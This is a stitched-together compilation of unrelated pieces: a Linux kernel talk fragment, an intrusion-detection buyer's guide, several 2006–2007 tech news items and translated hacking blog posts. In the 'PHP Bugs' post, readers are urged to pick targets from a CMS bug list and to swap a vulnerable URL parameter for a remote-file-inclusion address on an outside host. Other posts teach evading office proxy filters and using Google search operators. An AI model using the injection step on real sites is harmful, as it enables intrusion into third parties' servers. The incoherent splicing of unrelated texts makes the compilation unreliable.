Now, this is true; it would be great to have a simple set of tests that everyone could run for every release to ensure that nothing was broken and that everything's just right. But unfortunately, we don't have such a test suite just yet. The only real set of tests we have is for everyone to run the kernel on their machines and to let us know if it works for them.

So, that's what I suggest for people who want to help out, yet are not programmers. Please, run the nightly snapshots from Linus's kernel tree on your machine, and complain loudly if something breaks. If no one pays attention, complain again. Be really persistent. File bugs in:

slide 23
People do track things there. Sometimes it doesn't feel like it, but again, be persistent. If someone keeps complaining about something, we do feel bad, and work to try to fix things. Don't feel bad about being a pest, because we need more pests to keep all of us kernel developers in line.

And if you really feel brave, please, run Andrew Morton's -mm kernel tree. It contains all of the different kernel maintainer's development trees combined into one big mass of instability. It is the proving ground for what will eventually go into Linus's kernel tree. So we need people testing this kernel out to report problems early, before they go into Linus's tree.

I wouldn't recommend running Andrew's kernels on a machine with data that you care about, that would not be wise. So if you have a spare machine, or you have a very good backup policy, please, run his kernels and let us know if you have any problems with stuff.

So finally, in conclusion, here's the main things that I hope people remember:

slide 24
slide 25
slide 26
slide 27
slide 28
slide 29

What is IDS?

IDS is an acronym for Intrusion Detection System. An intrusion detection system detects intruders; that is, unexpected, unwanted or unauthorized people or programs on my computer network.

Why do I need IDS? A network firewall will keep the bad guys off my network, right? And my anti-virus will recognize and get rid of any virus I might catch, right? And my password-protected access control will stop the office cleaner trawling through my network after I've gone home, right? So that's it - I'm fully protected, right?

Wrong!

A firewall has got holes to let things through: without them, you wouldn't be able to access the Internet or send or receive emails. Anti-virus systems are only good at detecting viruses they already know about. And passwords can be hacked, stolen or left lying about on post-its.

That's the problem. You can have all this security, and all you've really got is a false sense of security. If anything or anyone does get through these defenses, through the legitimate holes, it or they can live on your network, doing whatever they want for as long as they want. And then there's a whole raft of little known vulnerabilities, known to the criminals, who can exploit them and gain access for fun, profit or malevolence. A hacker will quietly change your system and leave a back door so that he can come and go undetected whenever he wants. A Trojan might be designed to hide itself, silently gather sensitive information and secretly mail it back to source. And you won't even know it's happening - worse, you'll believe it can't be happening because you've got a firewall, anti-virus and access control.

Unless, that is, you also have an intrusion detection system. While those other defenses are there to stop bad things getting onto your network, an intrusion detection system is there to find and defeat anything that might just slip through and already be on your system. And in today's world, you really must assume that things will slip through - because they most certainly will. From the outside, you will be threatened by indiscriminate virus storms; from hackers doing it for fun (or training); and more worryingly from organized criminals specifically targeting you for extortion, blackmail or saleable trade secrets.

From the inside, you will be threatened by walk-in criminals using social engineering skills to obtain passwords to, or even use of, your own PCs; by curious staff who simply want to see what their colleagues are earning; and by malcontents with a grievance.

What you really mustn't assume is that this is fanciful, or that you don't have anything worth stealing. According to experts in the field, even something as basic as stored HR data on your employees is worth $10 per person on the black market. Search for 'FBI' on this site, and see the variety of attacks and dangers that exist, and how often there is a degree of success despite firewalls and anti-virus and access control. You still need all of those defenses - but you also need an intrusion detection system.
What do I need in IDS?

Intrusion detection describes the intention - not the methodology. There are several different ways by which this can be achieved; so anything that detects intrusions is an IDS. Which method you choose really depends upon what you need: and if you don't already have in-house security expertise, it would be worth employing a consultant to help reach your decision.

Note that IDS is no longer a new technology - it's a mature technology. Since the term is no longer new, it no longer has that 'buzz' required by marketing managers. This has been aggravated by the analyst firm Gartner Group proclaiming that IDS is dead and has been replaced by IPS. This is wrong. Ignore it. IPS is different from IDS. Vendors and security experts know this, but the result is that manufacturers are tempted to find new terms - and one of these is Network Behavior Analysis. This is a good and useful approach; but one of the primary purposes of NBA is to detect intrusions - in other words, IDS.

Remember, too, that good security is the right level of security for you. You need to strike the right balance between the cost of the security and the value of your goods - there's no point in spending more on security than the value of what you're protecting. Risk management principles using a thorough risk analysis will help you decide how much to spend.

Armed with this information, you can look for features such as:

* attack halting (stops the attack, whether it is a program or a hacker)
* attack blocking (closes the loop-hole through which the attacker gained access)
* attack alerting (either pop-up to an online admin, or email or SMS to a remote admin)
* information collecting (on what is done by the attack to the network, and from where the attack came - helps gather forensic evidence should a prosecution become necessary or possible)
* full reporting (so that you can learn from your mistakes, and prevent future problems)
* fail-safe features (such as encrypted messages and VPN tunneling within the IDS to hide its presence from, and inhibit interference by, any hacker).

If you've got a large network, or particularly valuable information, you may like to look out for the extras offered with some intrusion detection systems:

* honeypot or padded cell (a fake network or area designed specifically to attract and contain attacks, so that you can analyze them and learn from their behavior)
* vulnerability analysis (so that you can check your network for all known vulnerabilities in order to pre-empt rather than just detect intrusions)
* file integrity checker (a mathematical way of knowing if a file has been altered in any way, and therefore potentially compromised by an intruder - see the sketch below)
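To give a feel for how that last idea works, here is a bare-bones PHP sketch (entirely illustrative; the watched paths are invented, and a real product does far more, such as protecting its own baseline from tampering):

// Minimal file-integrity idea: hash each watched file and compare against
// a previously recorded baseline; any mismatch means the file was altered.
$watched  = array('/etc/passwd', '/var/www/index.php'); // hypothetical paths
$baseline = 'baseline.txt';

if (!file_exists($baseline)) {
    // first run: record the current hash of every watched file
    $lines = array();
    foreach ($watched as $path) {
        $lines[] = $path . ' ' . sha1_file($path);
    }
    file_put_contents($baseline, implode("\n", $lines));
    echo "Baseline recorded.\n";
} else {
    // later runs: re-hash and compare against the stored baseline
    foreach (file($baseline) as $line) {
        list($path, $hash) = explode(' ', trim($line));
        if (sha1_file($path) !== $hash) {
            echo "ALERT: $path has been modified!\n";
        }
    }
}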

One other point - don't think that you're so small that you don't need or can't find an IDS. IDS as described above is available for everything from large enterprises on down. But even if you just have a couple of PCs, you can still get, and still need, an intrusion detection system. It's just that for a single desktop system it goes by different names and has fewer automated features: it's a personal firewall and an anti-spyware program. The purpose is the same - to detect and stop intrusions - it's just that here you have to keep it up to date manually, conduct regular scans manually, and it isn't as intelligent or sophisticated.
Where do I get IDS?

Here are a few suppliers to get you started - but keep checking back to this resource center, because we'll be adding more companies and more products all the time:

* AirDefense
* Arbor Networks
* CounterStorm
* Enterasys
* GFI
* ISS
* Lancope
* Snort
* SonicWALL
* StillSecure

It will also be worth looking at Unified Threat Management. This is often a physical device, an appliance, and it just means that you get more than one security feature in a single box. Unified Threat Management will frequently include an IDS.
How can I evaluate IDS?

The first thing you need to do is to make sure that you know what you need, and what you can afford. Then you need to know what's available. Only then can you decide what to get. So first check the Buyer's Guide in this resource centre to see what you can get. Conduct a risk analysis exercise - use a consultant if you need to. And then, knowing what is available and what you need, consult our Comparison Guide and see which product comes closest to that need. And if you have specific queries, problems or worries - get some free help and advice from Ask the Experts.

Google Working To Make 'iPod/iTunes for Books'

nettamere writes to mention an initiative by Google to take the library online. As the end result of Google Book Search, the company hopes to see a future where it is not merely referring customers to Amazon but instead offering them the ability to download books directly. According to the Times Online, Google hopes to 'do for books what the iPod did for music'. From the article: "One of Google's partners, Evan Schnittman of Oxford University Press, said he foresaw a number of categories becoming popular downloads: 'Do you really want to go on holiday carrying four novels and a guide book?' The book initiative would be part of Google's Book Search service and its partnership with publishers, which will make books searchable online with publishers' approval. At present, only a sample of each book is available online."

Sunday, January 21, 2007

Linus Torvalds

By giving away his software, the Finnish programmer earned a place in history

By PETER GUMBEL

Linus Torvalds was just 21 when he changed the world. Working out of his family's apartment in Helsinki in 1991, he wrote the kernel of a new computer operating system called Linux that he posted for free on the Internet — and invited anyone interested to help improve it.

Today, 15 years later, Linux powers everything from supercomputers to mobile phones around the world, and Torvalds has achieved fame as the godfather of the open-source movement, in which software code is shared and developed in a collaborative effort rather than being kept locked up by a single owner.

Some of Torvalds' supporters portray him as a sort of anti-Bill Gates, but the significance of Linux is much bigger than merely a slap at Microsoft. Collaborating on core technologies could lead to a huge reduction in some business costs, freeing up money for more innovative investments elsewhere. Torvalds continues to keep a close eye on Linux's development and has made some money from stock options given to him as a courtesy by two companies that sell commercial applications for it.

But his success isn't just measured in dollars. There's an asteroid named after him, as well as an annual software-geek festival. Torvalds' parents were student radicals in the 1960s and his father, a communist, even spent a year studying in Moscow. But it's their son who has turned out to be the real revolutionary.

Saturday, January 20, 2007

Microsoft to Introduce VPN Tunneling Protocol

A new secure VPN tunneling protocol is cooking in the labs at Microsoft. The new form of VPN tunnel is called SSTP (Secure Socket Tunneling Protocol). Microsoft is scheduled to introduce SSTP in Windows Vista Service Pack 1 and in Longhorn Server.

Currently, VPN connections run into trouble when a firewall or a NAT router blocks PPTP's GRE traffic or L2TP's ESP traffic, preventing the client from reaching the server. Microsoft is working to deliver ubiquitous connectivity through VPN.

The Secure Socket Tunneling Protocol “will allow VPN tunnel connectivity across any scenarios i.e. behind NAT routers or firewalls or web proxies. And the best part of it - your end user remote access experience (like using RAS dialer) and network administration experience (like using RRAS server) remains same as before. i.e. SSTP based VPN tunnel just acts as a one more VPN tunnel that gets plugged into MS VPN client and VPN servers,” revealed Samir Jain, Lead Program Manager, RRAS, Windows Enterprise Networking, adding that the SSTP based VPN protocol will be made available as a beta together with Longhorn server Beta3.

Via the Secure Socket Tunneling Protocol (SSTP), the VPN tunnel will function over Secure-HTTP. In this manner, the problems with VPN connections based on the Point-to-Point Tunneling Protocol (PPTP) or Layer 2 Tunneling Protocol (L2TP) will be eliminated. Web proxies, firewalls and Network Address Translation (NAT) routers located on the path between clients and servers will no longer block VPN connections.
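
The principle is easy to see in a few lines of Python. This is only an illustration of the idea, not the actual SSTP wire protocol, and vpn.example.com is a placeholder host: wrap an ordinary TCP socket in TLS on port 443, and everything sent through it looks like normal HTTPS to any firewall, web proxy or NAT router on the path.

    import socket
    import ssl

    HOST = "vpn.example.com"   # placeholder endpoint, not a real SSTP server

    context = ssl.create_default_context()
    raw = socket.create_connection((HOST, 443))
    tls = context.wrap_socket(raw, server_hostname=HOST)

    # Anything written here crosses the network as opaque TLS application
    # data on port 443; SSTP carries PPP frames the same way, inside what
    # looks to intermediaries like an ordinary HTTPS session.
    tls.sendall(b"tunneled payload would go here")
    tls.close()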

“The good part of SSTP is it integrates with MS RAS client/server infrastructure seamlessly. For example, SSTP supports password + strong user authentication (like smart-card, RSA securID, etc) using various PPP authentication algorithm. Other features of RAS (like generating profiles using connection manager administration kit, remote access policies, etc) - just works - similar to other PPTP/L2TP,” added Samir Jain.

Microsoft, Google Agree to NGO Code of Conduct

"Technology companies have come under fire for providing equipment or software that permits governments to censor information or monitor the online or offline activities of their citizens. For example, last year, Google's approach to the China market was criticized over its creation of a censored, local version of its search engine. Microsoft, Google, and two other technology companies will develop a code of conduct with a coalition of nongovernmental organizations (NGO) to promote freedom of expression and privacy rights, they announced Friday. The two companies along with Yahoo, and Vodafone Group said the new guidelines are the result of talks with Business for Social Responsibility (BSR) and the Berkman Center for Internet & Society at Harvard Law School."

Friday, March 03, 2006

PHP Bugs

I originally wrote the PhpInjection article just as a quick bit of background, but people keep asking questions, and more bugs seem to turn up by the day. One reason is that more and more people rely on a CMS (content management system) as a fast way to build a website. A CMS does make building a website very quick, but it also means, often without anyone realizing it, that one website ends up the same as the next.

And if the sites are the same, because they are built on the same scripts, then their bugs are the same too. Below is the list of bugs I have gathered. Use it to pick a target.

Just have a look here

From that list you can start your search. Once you have found a target, change:

http://www.injection.com/cmd? into http://geocities.com/k4k3_rgb/test?&cmd

And that's it - check the result. If it doesn't work, the hole has already been patched, so go straight on and look for another one.

Friday, February 24, 2006

Getting Around a Proxy Server

One day a friend asked me: "Why can't I open Friendster at the office? I think it's blocked on the server...." Why does this happen? Because of the proxy server and the firewall rules on the gateway.
Before going further, let me give a short overview of proxy servers and gateway firewalls.

Proxy server:
What is a proxy server? Let's ask 'Auntie Wiki' first...
"A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. A client connects to the proxy server, then requests a connection, file, or other resource available on a different server. The proxy provides the resource either by connecting to the specified server or by serving it from a cache. In some cases, the proxy may alter the client's request or the server's response for various purposes.
A proxy server can also serve as a firewall."

In short, it is a server or machine that manages the data traffic on a network and stores previously visited web pages in its cache to manage bandwidth usage. As an illustration, a URL that has already been visited is kept in the cache, and later requests for that URL are served from the cache or handled according to whatever rules have been set. Some organizations use such rules to restrict what users can do: for example, an office where www.friendster.com cannot be opened during working hours, or a campus or school network where websites with pornographic or violent content are blocked.

Firewall:
I covered this one on a previous occasion; see the article 'Si Tembok Api' (The Wall of Fire). In essence it is a system, hardware or software, that controls and logs the data traffic going out of and coming into the local network.

Because rules have been set on both of these systems, we cannot use the internet however we please. But don't worry - it turns out all of it can be worked around.

1. First method:
Once again, everything comes down to rules, in this case rules governing traffic and ports. The simplest way around this restriction is to use an anonymizer or another proxy server outside our own organization's proxy or gateway. Why does this work? Because all that gets logged is that we opened the URL of the anonymous-browsing service or external proxy; whichever URL we then visit through it is never visible to our own proxy or firewall (a short script sketch follows the examples below).

For examples, just try: www.guardster.com, www.freebrowsing.com, etc.
For proxy lists, have a look at: http://familycode.atspace.com/irc.htm or http://www.samair.ru/proxy/socks.htm
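
As a rough sketch of what the first method looks like in practice, the Python snippet below (with a made-up proxy address) sends a request through an external proxy; the gateway's logs only ever show a connection to the proxy, never the final destination URL.

    import urllib.request

    # Hypothetical external proxy - substitute one from the lists above.
    proxy = urllib.request.ProxyHandler({"http": "http://203.0.113.10:8080"})
    opener = urllib.request.build_opener(proxy)

    # The gateway sees a connection to 203.0.113.10:8080; the real
    # destination below travels inside the proxied request.
    response = opener.open("http://www.friendster.com/")
    print(response.getcode())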

2. Second method:
The second method is to 'tunnel' through our proxy server. This one takes a little knowledge and information. As I said before, it all comes down to how the traffic is managed and which ports are used. So find out which ports are open and what they are used for, using a port-scanning technique. Once you know, use one of the many tools available on the internet for proxy tunneling. Don't be lazy - there are plenty; just ask 'Uncle Google' with the keyword "proxy tunneling".
For example: InvisibleBrowsing, Bypass Client, Proxyway, etc.
Then configure the proxy to be used and, if necessary, set the port as well.

So that is how to get around the proxy at your office or campus. There is actually one more method, and it is quite easy. It takes advantage of our famously kind uncle who provides us with everything - yes, our 'Uncle Google'. GOOGLE... not for searching this time, but for staying anonymous. How? We use one of its facilities: Translate.

Just try: http://translate.google.com/translate?u=

Append the address of the blocked site after u=. This is really Google's facility for translating the contents of a website, but if there is nothing to translate it simply shows the original page. The method is fairly old, though, and a clever admin can block it.
That's all the information I have to share for now.

That wraps up this tutorial. It was written purely for educational purposes; any action taken as a result of reading this article is not the responsibility of the author.

The Power of Uncle Google

After such a long time without a new post, today I can finally write one again. I was out of town for the past few days, so never mind posting - I didn't even have an internet connection. On this occasion I want to share a little information about one of the most powerful search engines in the world. You are probably already quite familiar with it: "GOOGLE", our search engine, the one that makes it easy for all of us to find information about anything in the world in a very short time. Or, as we affectionately call it, 'Uncle Google'.

This time I will give you just a few tips on using all of these Google facilities.
So let's get straight to it. To see which facilities Google provides, take a look at this link:

-= http://www.google.com/intl/en/options/ =-

Those are all the services Google offers. In this first post I will only give a few tips on using Google itself.

1. First, search in detail: enter your keywords as completely as possible, so that the search is better targeted. Below I list some pieces of Google syntax (a short script example combining them follows the list):

-. [intitle:]
Lets us search by the title of a web page; Google restricts the results to pages whose title matches. For example, "intitle:login" returns all web pages with "login" in the title. Keep in mind that these commands only bind to the single word that follows them: "intitle:login password" returns pages with "login" in the title and the word "password" anywhere on the page.
If you want pages whose title contains the whole phrase "login password", type "allintitle:login password".

-. [inurl:]
Restricts the search to pages whose URL contains the given string. For example, "password inurl:www.jasakom.com" searches for the keyword "password" only on pages whose URL contains www.jasakom.com.

-. [site:]
Restricts the search to a particular site or domain. For example, "hacking site:co.id" searches for the keyword "hacking" only across sites in the .co.id domain.

-. [filetype:]
Restricts the search to files with a particular extension. For example, "filetype:doc site:gov" returns only links to files with the .doc extension on .gov domains.

-. [link:]
Shows the web pages that link to a given site. For example, "link:www.123.net" returns all pages that link to www.123.net.

-. [related:]
Shows sites similar to the one specified. For example, "related:www.blackhat.com" lists pages similar to blackhat.com.

-. [intext:]
Searches the body text of pages for the given words, ignoring the URL and the page title. For example, "intext:exploits" returns web pages containing the word "exploits".

-. [phonebook:]
Helps you search for a person or an address. For example, "phonebook:Anto+Bandung" returns address information for that person in the location searched.
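
Since a Google search is just a URL, the operators above can also be combined from a script. A minimal Python sketch - the query here is only an example:

    import urllib.parse

    # Combine several of the operators described above into one query.
    query = 'intitle:"index of" filetype:doc site:co.id'
    url = "http://www.google.com/search?q=" + urllib.parse.quote(query)
    print(url)
    # http://www.google.com/search?q=intitle%3A%22index%20of%22%20filetype%3Adoc%20site%3Aco.id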

That is all for this short bit of sharing about the 'GOOGLE' search engine.


Source: the book 'Hack Attack, Konsep, Penerapan dan Pencegahan' (Hack Attack: Concepts, Implementation and Prevention)